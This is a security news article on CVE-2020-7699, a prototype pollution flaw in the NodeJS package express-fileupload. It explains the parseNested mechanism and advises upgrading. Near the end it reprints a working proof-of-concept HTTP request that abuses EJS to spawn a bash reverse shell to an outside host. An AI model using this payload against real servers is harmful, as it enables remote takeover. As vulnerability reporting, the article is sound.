Pierluigi Paganini August 05, 2020

Expert found a flaw in a popular NodeJS module that can allow attackers to perform a denial-of-service (DoS) attack on a server or get arbitrary code execution.

The NodeJS module “express-fileupload,” which has more that 7.3 million times downloads from the npm repository.

The NodeJS module is affected by a ‘Prototype Pollution’ CVE-2020-7699 vulnerability that can allow attackers to perform a denial-of-service (DoS) attack on a server or inject arbitrary code.

“This affects the package express-fileupload before 1.1.8. If the parseNested option is enabled, sending a corrupt HTTP request can lead to denial of service or arbitrary code execution.” reads the NIST’s description.

Unfortunately, the actual number of installs could be greater because developers could download the module from alternative repositories, including GitHub and mirror websites.

Prototypes are used to define a JavaScript object’s default structure and default values, they are essential to specify an expected structure when no values are set.

An attacker that is able to modify a JavaScript object prototype can make an application crash and change behavior if it doesn’t receive the expected values.

Due to the diffusion of JavaScript, the exploitation of prototype pollution flaws could have serious consequences on web applications.

Prototyping attacks consist of injecting incompatible types of objects into existing ones to trigger errors that could lead to Denial of Service (DoS) condition or arbitrary code execution, including the establishment of a remote shell.

According to the security researcher Posix who discovered the vulnerability, the issue leverages the “parseNested” feature implemented by the express-fileupload.

The express-fileupload module implements several options for uploading and managing files in the nodejs application. One of the options is the parseNested which makes argument flatten into nested objects.

“Therefore, if we provide {"a.b.c": true} as an input,
Internally, It will used as {"a": {"b": {"c": true}}}” reads the post published by Posix.

Below the code for the the ‘parseNested’ option:

const express = require('express');
const fileUpload = require('express-fileupload');
const app = express();

app.use(fileUpload({ parseNested: true }));

app.get('/', (req, res) => {
    res.end('express-fileupload poc');
});

app.listen(7777)

Upon providing a payload in the “Content-Disposition” HTTP header, an attacker can provide a “__proto__.toString” value to trigger the attack.

“Therefore, configure and run the express server using express-fileupload in the above form.” continues the post.

The “__proto__” mutator can be used to modify JavaScript’s “Prototype” property as inherited by all JS objects and structures.

This means that the above HTTP request will override and corrupt the build-in “toString” method of every object present in users’ code.

“If Object.prototype.toString can be polluted, this will cause an error, and for every request, express [sic] always returns 500 error,” continues the researcher.

The researcher also explained that an attacker could exploit the same flaw to get a shell on the vulnerable system. For this variant of the attack, it is necessary that the vulnerable “express-fileupload” version used by the application was also using the templating engine EJS (Embedded JavaScript templates).

“The simplest way to obtain shell through prototype solution in the express application is by using the ejs. Yes, There is a limitation to whether the application should be using the ejs template engine” continues the expert.

An attacker can trigger the issue by sending an HTTP request that overwrites the “outputFunctionName” option of EJS.

The payload below exploits prototype pollution within express-fileupload, and instructs EJS (should it be in use) to execute a NodeJS “child_process.” This process can be used to get a reverse shell to the attacker’s computer.

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=--------1566035451
Content-Length: 221

----------1566035451
Content-Disposition: form-data; name="__proto__.outputFunctionName";

x;process.mainModule.require('child_process').exec('bash -c "bash -i &> /dev/tcp/p6.is/8888 0>&1"');x
----------1566035451--

The good news is that immediately after receiving the researcher’s report, the “express-fileupload” fixed the vulnerability. Users are recommended to get the latest 1.1.9 version from the npm repository.

Pierluigi Paganini

(SecurityAffairs – hacking, D-Link)

[adrotate banner=”5″]

[adrotate banner=”13″]